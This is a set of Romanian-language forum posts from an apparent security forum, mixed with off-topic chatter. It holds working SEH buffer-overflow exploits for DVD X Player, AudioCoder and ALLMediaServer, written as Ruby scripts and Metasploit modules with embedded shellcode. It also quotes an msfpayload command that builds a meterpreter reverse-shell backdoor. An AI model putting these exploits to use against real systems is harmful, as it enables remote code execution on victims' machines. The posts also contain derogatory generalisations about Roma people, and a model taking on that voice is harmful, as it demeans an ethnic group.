neox

#!/usr/bin/env ruby # Exploit Title:DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow # Download link :http://www.aviosoft.com/dvd-player.html # RST # Author: metacom # Date (found):03.05.2013 # Date (publish):03.05.2013 # version: 5.5.3.7 Pro & Standard # Category: poc # Tested on: windows 7 German # Notes: Last Update DVD X Player Jan 28, 2012 # SOLUTION: None calc = "\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9" + "\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71" + "\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84" + "\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f" + "\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1" + "\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40" + "\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb" + "\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78" + "\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2" + "\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56" + "\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2" + "\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e" + "\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb" + "\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c" + "\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83" + "\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0" + "\xda\xca\x18" junk = "\x41" * 601 # Junk bytes nseh = "\xEB\x06\x90\x90" # Short (6 bytes) jump! seh = "\xB8\x22\x30\x60"#0x603022B8 5E POP ESI from Configuration.dll nops = "\x90" * 50 head = "http://" data= head + junk + nseh + seh + nops + calc File.open("crash.plf", 'w') do |b| b.write data puts "file size : " + data.length.to_s end

Pai atuncia de ce o da in sf in tutorial, dupa ce se ma complic cu toate prostile pe care le face el cind poti sa faci un simplu paypload backdoor (de exemplu faci copie la calc si il retranscrie pe cel din windows) si tot asa cum restart windows se incarca cu windowsul si cu multihandler controlezi legatura dar nu rezolvi nimic pentru ca este local. Tu nu incelegi o chestie cind folosesti multihandler din Metasploit tu nu ai cum sa contolezi ip extern ca sa faci asa ceva trebuie minumul inca 10 pasi care lipsesc din tutorial. Nu vreau sa ma cert sau sa ne contrazicem dar ideia nu este noua sau complecta si faza cu badchars tiam zis aicia dovedeste ca nu stie ce vb in tutorial daca nu crezi uitate si pe wikipedia cu badcahrs “x00\x0a\x0d” sa vezi pentru ce este . Newline - Wikipedia, the free encyclopedia Din articolul original root@kali:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R| msfencode –e x86/shikata_ga_nai –t raw –a x86 –b “x00\x0a\x0d” –c 3 x > /var/www/data.bin [*]x86/shikata_ga_nai succeded with size 342 (iteration=1)[*]x86/shikata_ga_nai succeded with size 369 (iteration=2)[*]x86/shikata_ga_nai succeded with size 396 (iteration=3) Unde: LHOST=192.168.1.10 – adresa IP a serverului ce initiaza mecanismul de ascultare; LPORT=4444 – portul de ascultare;-e x86/shikata_ga_nai – tipul de encoder utilizat; -c 3 – 3 bucle de codificare(loops); data.bin – payload(backdoor);Urmatorul pas consta in crearea si initializarea unui server menit sa lanseze un mecanism deascultare a cererilor de conectare din partea clientilor(victimelor). Pentru aceasta vom deschide oconsola Kali Linux si vom invoca <msfcli> astfel si explicatia –b “x00\x0a\x0d” pauza Deci eu cind am vazut faza asta mia dat de inceles ca nu are rost ca mai citesc mai departe si sa ma agit ca un Pepsi incearca tutorialul si tu sa vezi ce se intimpla . Deja facem off topic multi de pe rst va ocupati cu Metasploit voi ce ziceti ? Ce sa zic greselile mele de gramatica asta e ce sa fac

Mai omule nu are cum sa mearga la distanta el da in payload ip intern ala merge numai local pentru ip extern trebuie controlat root@kali:~# msfvenom -h Usage: /opt/metasploit/msf3/msfvenom [options] Options: -p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads -l, --list [module_type] List a module type example: payloads, encoders, nops, all -n, --nopsled [length] Prepend a nopsled of [length] size on to the payload -f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war -e, --encoder [encoder] The encoder to use -a, --arch [architecture] The architecture to use --platform [platform] The platform of the payload -s, --space [length] The maximum size of the resulting payload -b, --bad-chars The list of characters to avoid example: '\x00\xff' !!!!!!UITATE AICIA NU VB PROSTI -i, --iterations [count] The number of times to encode the payload -c, --add-code [path] Specify an additional win32 shellcode file to include -x, --template [path] Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -h, --help daca nu stiam nu ma bagam deci nu vb aiurea msfvenom -h iti livreaza tot ce se poate -b, --bad-chars The list of characters to avoid example: '\x00\xff'

Metoda nu cred macar ca merge dupa cum am observat pe codul sursa si chiar daca ar merge numai local merge asa ceva pentru ca sa mearga de la distanta trebuie mai multe facute cum ar fii controlat ip cum ar fii no-ip si ce ma spart este comanda asta msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R| msfencode –e x86/shikata_ga_nai –t raw –a x86 –b “x00\x0a\x0d” –c 3 x > /var/www/data.bin msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 corect meterpreter cu ip LPORT=4444 R corect portul msfencode –e x86/shikata_ga_nai –t corect codarea payload raw –a x86 corect raw output arhitectura 32 biti dar aicia este varza –b “x00\x0a\x0d” incorect asa ceva folosesti numai la exploit development asta ineamna elimina bytearray bad characters (caractere rele dintrun cod binar) De exemplu, caracterele \x0a si \x0d sunt, de obicei, marcate la fel de rau, deoarece acestea sunt Line Feed (LF) si carriage return (CR), \x00 este zero si deia il scoti si ma interb ce cauta asa ceva intrun payload tip backdoor Si deja de aicia nu are rost sa incerc sau sa imi bat capul cu tema asta

Metasploit exploit ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'AudioCoder Buffer Overflow Exploit (SEH)', 'Description' => %q{ This module exploits a vulnerability found in AudioCoder 0.8.18 filename handling routine. When supplying a string of input data embedded in a .m3u file, As a result, if this input data is long enough, it can cause a stack-based buffer overflow, which may lead to arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom27[at]gmail.com', # Original discovery 'metacom', # MSF Module 'RST', ], 'References' => [ [ 'OSVDB', '<insert OSVDB number here>' ], [ 'CVE', 'insert CVE number here' ], [ 'URL', '<insert another link to the exploit/advisory here>' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh #'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d", # <change if needed> 'DisableNops' => true, }, 'Targets' => [ [ 'Windows 7',# Tested on: Windows 7 SP1/SP0 { 'Ret' => 0x660104EE, #libiconv-2.dll 'Offset' => 765 } ], ], 'Privileged' => false, #Correct Date Format: "M D Y" #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec 'DisclosureDate' => 'May 01 2013', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'audiocoder.m3u']),], self.class) end def exploit buffer = "http://" buffer << rand_text_alpha_upper(target['Offset']) #junk buffer << generate_seh_record(target.ret) buffer << payload.encoded #2824 bytes of space buffer << rand_text_alpha(5000-buffer.length) # more junk may be needed to trigger the exception print_status("Creating '#{datastore['FILENAME']}'...") file_create(buffer) end end direct-exploit #!/usr/bin/env ruby # Exploit Title:AudioCoder 0.8.18 Buffer Overflow Exploit (SEH) # Download link :http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe # Vulnerable Product:AudioCoder # Date (found): 30.04.2013 # Date (publish): 01.05.2013 # RST # Author: metacom # Version: version 0.8.18 # Category: poc # Tested on: windows 7 German begin #calc shellcode = "\x89\xe0\xdb\xc8\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" + "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" + "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" + "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" + "\x58\x4d\x59\x53\x30\x55\x50\x53\x30\x43\x50\x4d\x59\x5a" + "\x45\x56\x51\x58\x52\x52\x44\x4c\x4b\x50\x52\x56\x50\x4c" + "\x4b\x50\x52\x54\x4c\x4c\x4b\x31\x42\x45\x44\x4c\x4b\x34" + "\x32\x31\x38\x44\x4f\x4f\x47\x51\x5a\x37\x56\x30\x31\x4b" + "\x4f\x50\x31\x49\x50\x4e\x4c\x57\x4c\x35\x31\x33\x4c\x53" + "\x32\x56\x4c\x37\x50\x49\x51\x38\x4f\x54\x4d\x35\x51\x49" + "\x57\x4d\x32\x5a\x50\x36\x32\x36\x37\x4c\x4b\x46\x32\x54" + "\x50\x4c\x4b\x47\x32\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x47" + "\x30\x54\x38\x4b\x35\x49\x50\x42\x54\x51\x5a\x35\x51\x4e" + "\x30\x50\x50\x4c\x4b\x57\x38\x55\x48\x4c\x4b\x36\x38\x31" + "\x30\x45\x51\x59\x43\x4b\x53\x57\x4c\x30\x49\x4c\x4b\x30" + "\x34\x4c\x4b\x55\x51\x4e\x36\x30\x31\x4b\x4f\x50\x31\x49" + "\x50\x4e\x4c\x39\x51\x48\x4f\x34\x4d\x43\x31\x49\x57\x46" + "\x58\x4b\x50\x42\x55\x5a\x54\x43\x33\x43\x4d\x5a\x58\x37" + "\x4b\x33\x4d\x57\x54\x53\x45\x4a\x42\x30\x58\x4c\x4b\x56" + "\x38\x36\x44\x43\x31\x48\x53\x35\x36\x4c\x4b\x54\x4c\x30" + "\x4b\x4c\x4b\x56\x38\x45\x4c\x53\x31\x39\x43\x4c\x4b\x54" + "\x44\x4c\x4b\x35\x51\x4e\x30\x4b\x39\x51\x54\x31\x34\x37" + "\x54\x51\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x46\x31\x4b" + "\x4f\x4d\x30\x31\x48\x51\x4f\x50\x5a\x4c\x4b\x42\x32\x4a" + "\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c\x4d\x4c\x45\x48" + "\x39\x55\x50\x55\x50\x53\x30\x50\x50\x43\x58\x36\x51\x4c" + "\x4b\x32\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4c\x30\x48" + "\x35\x39\x32\x56\x36\x53\x58\x59\x36\x5a\x35\x4f\x4d\x4d" + "\x4d\x4b\x4f\x38\x55\x57\x4c\x35\x56\x33\x4c\x44\x4a\x4b" + "\x30\x4b\x4b\x4d\x30\x33\x45\x54\x45\x4f\x4b\x50\x47\x42" + "\x33\x33\x42\x42\x4f\x42\x4a\x43\x30\x31\x43\x4b\x4f\x59" + "\x45\x32\x43\x43\x51\x42\x4c\x33\x53\x36\x4e\x43\x55\x43" + "\x48\x55\x35\x43\x30\x41\x41" file = "fuzz.m3u" head = "http://" junk = "\x90" * 765 # Distance to overwrite EIP nseh = "\xEB\x06\x90\x90" # Short (6 bytes) jump! seh = "\xEE\x04\x01\x66" # POP ECX / POP ECX / RETN from libiconv-2.dll nops = "\x90" * 80 textfile = open(file , 'w') textfile.write(head + junk + nseh + seh + nops + shellcode) textfile.close() puts puts " Vulnerable file created!...\n" end

Atunci bravo nu am comentat nimic

Daca nu te mai poti autentifica asta nu insemana ca confirmi metoda De exemplu eu am un cont paypal si din familia mea a incercat sa logeze si a dat pasul de citeva ori gresit ,imediat a blocat contul. Nu am mai putut sa ma logez am incercat cu am uitat pasul si ma interbat raspunsul la interbarea secreta tot am facut dar nu a mers. Am rezolvat numai cu tel la paypal si fax cu buletin pe urma a deblocat . Deci daca am email id de la paypal tau si incerc sa ma logez de citeva ori si dau gresit il blocheza asta este un mecanism impotriva la brute force. Si cum spune Gecko cum dracu sa faci pe adresa de mail de la alcineva cine confirma linkul ce il primesti prin email ????? pe linga treaba asta chiar daca a blocat contul (nu este sters il are paypal in memoria lor ) a blocat si id EMAIL incearca sa vezi daca vrei sa faci alt cont spune ca id de mail este folosit de alcineva

Nu poti manipula vb de lucruri sfinte (nu spun ca nu se poate,totul este posibil dar trebuie sa fii un ninja expert deci oameni de rand nu au nici o sansa ) Eu am un stick vodafone usb stick k3565-z fara abonament si il incarc cu 10€ si am 7 zile pot sa fac ce vreau pe net fara limita.

Mutati la penale cosul de gunoi nu inceleg cum de a primit si 5 stele postul penal de tot,vreti sa va bateti joc si de categoria asta nu sint destule categori cu bla bla asta este categoria Exploituri si POCs

bravo Dar te rog fa si tu un video cu demonstratia xss, poti folosi Camtasia Studio ca sa maschezi comenzile nu ca nu te cred doar numai asa pot sa iti dau reputatie

nu ai precizat ce wireles carte sau usb ai ?

Nu pot sa zic ca folosesc linux am win7 instalat, deci numai cind am nevoie BT5r3 si Kali Linux BT5r3 este BT folosesti la multe hacking,wireless etc... Kali este foarte tare mai ales forensic (partea de investigare) ce nu imi place la kali este urmatoarele probleme Erori nu este problema aia se repara, si cum apare versiune noua de la kali este tot mai buna inervant este ca nu mai poti migra elegant din consola de exemplu nu mai exista pentest folder si mai multe ..... Incepe sa fie o distribuite tot mai mult din click mouse deci migrare ca in windows mie nu imi place pentru mouse am windows

Super tare Canalul utilizatorului

Eu nu cred ca multi stiu ce inseamna Oday cind auzi la java Oday vorba lui Nytro trebuie sa fii orb sa apesi pe asa ceava

A participat careva din voi ???

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # [url=http://metasploit.com/framework/]Penetration Testing Software | Metasploit[/url] ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote #Rank definition: [url=http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking]Exploit Ranking - Metasploit Framework - Metasploit Redmine Interface[/url] #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'ALLMediaServer 0.94 Buffer Overflow Exploit', 'Description' => %q{ This module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability is caused due to a boundary error within the handling of HTTP request. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom<metacom27[at]gmail.com>', # Original discovery '<metacom>', # MSF Module 'RST', ], 'References' => [ [ 'OSVDB', '<insert OSVDB number here>' ], [ 'CVE', 'insert CVE number here' ], [ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh #'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00", # <change if needed> 'DisableNops' => true, }, 'Targets' => [ [ 'Windows 7',# Tested on: Windows 7 SP1/SP0 { 'Ret' => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll 'Offset' => 1065 } ], ], 'Privileged' => false, #Correct Date Format: "M D Y" #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec 'DisclosureDate' => 'Mar 28 2013', 'DefaultTarget' => 0)) register_options([Opt::RPORT(888)], self.class) end def exploit connect buffer = "http://" buffer << rand_text(target['Offset']) #junk buffer << generate_seh_record(target.ret) buffer << payload.encoded #3931 bytes of space # more junk may be needed to trigger the exception print_status("Sending payload to ALLMediaServer on #{target.name}...") sock.put(buffer) handler disconnect end end

vai de capul tau este ultimul post nu imi pun mintea cu ....... Es gibt kein "Besser" oder "Schlechter", nur Unterschiede. Diese müssen respektiert werden, egal ob es sich um die Hautfarbe, die Lebensweise oder eine Idee handelt.

Inca o intrebare domnul wirtz ce ai faut tu pentru tineri ??? =puscarie Eu traiesc in Germania si tot asa ca tine sint si aicia nazisti sinteti niste oameni fara viitor dati toata vina pe altii dar la voi nu va uitati (este usor sa dai vina pe altcineva la situatia in care traiesti tu dar uitate inainte in oglinda) Tigani majoritatea traiesc din bani si ajutoarele statului dar si puscaria coasta banii si este finantata de stat (tva de la oamenii) cu ce esti tu mai bun ca un tigan???? diferenta este culoarea, in rest tiganul coasta banii si ajutoare de la stat dar si tu la fel prin anii care zici tu ca ai facut puscarie.

Mai bine stateai in banca ta cu prezentarea lui peste, daca eram admin mutam la penale nici eu nu sunt de acord cu ce fac majoritatea tiganilor in ro dar asta e cum sint tigani in ro asa suntem noi in europa (mexicani europei) sa revenim la subiect asta este un forum IT nu de rasism sau alte prostii Aicia este prezentarea ta, ce stii in categoria IT ? ce ai scris tu Cum po?i s? te lauzi cu a?a ceva?

Depinde din punctul tau de vedere cum vezi tu forumul unii invata si se dezvolta in continuare alti se ocupa numai de gainari ca exemplu parole,keylogger,trojan daca cauti asa ceva gasesti o gramada foloseste search buton daca cauti ceva serios invata o limba de programare prima data sau incepe cu ceva usor cum ar fii HTML si pe urma vezi mai departe uiate aicia ca de inceput HTML Certification tutorialele sint gratis

De ce vrei sa te apuci de hacking ? ce emisiune TV ai vazut ? pentru furat conturi si alte prosti nu te ajuta nimeni daca interbai mai serios te ajutam un pic ps ai gresit categoria trebuia sa postezi la ajutor

Nytro am interbat numai sa vedem cum sta treaba am observat ca numai copiate exploiturile.De exemplu vinde exploit firefox memory corruption ce sa faci cu exploit ca ala numai ca pica firefox ala nu este exploit de picat este usor dar principalul este back connection Am observat ca si pe exploit-db nu mai este calitate de cind sint pensionar am timp si am tot probat la tipii de la offensive le ajunge daca exploitul face crash si il marcheaza ca verificat si ca merge. Astia mi se pare buna pagina ca verifica si numia care merg le pun Security Alert System - BugSearch.net

Aicia in Germania de cind sint legile aspre au aparut firme de detectivi ca ciupercile dupa ploaie si de exemplu Gema face contract cu ei sau un cantaret sau firmele de musica si pe urma fac asa, au ceva doveti sa duce la avocat si avocatul depune cerere la t-com (provider) pentru IP . Cum zici tu wildchild este bine, pe mine de exemplu numai programe ma intereseza din ro filme deloc ca nu ma pot uita la filme cu subtitrare daca o viata te uiti numai la filme direct traduse

A cumparat careva din voi exploits sau a vindut exploits pe pagina 1337day.com ??????

Sint siteuri cu filme online in Germania wildchild dar cu filme vechi este naspa si seiturile cu filme noi sint ilegale chiar daca seitul respectiv spune ca este legal. kab00M!! nu te baga la torrent in Germania au direct angajati care toata ziua stau la pinda mai sigur sint file de la rapidschare,upload.to etc sau mai simplu torrent din ro Daca locuieti in Germania ia-ti sky sau Telekom Entertain Pakete si ai tot ce vrei binenceles nu progarme s ialte chestii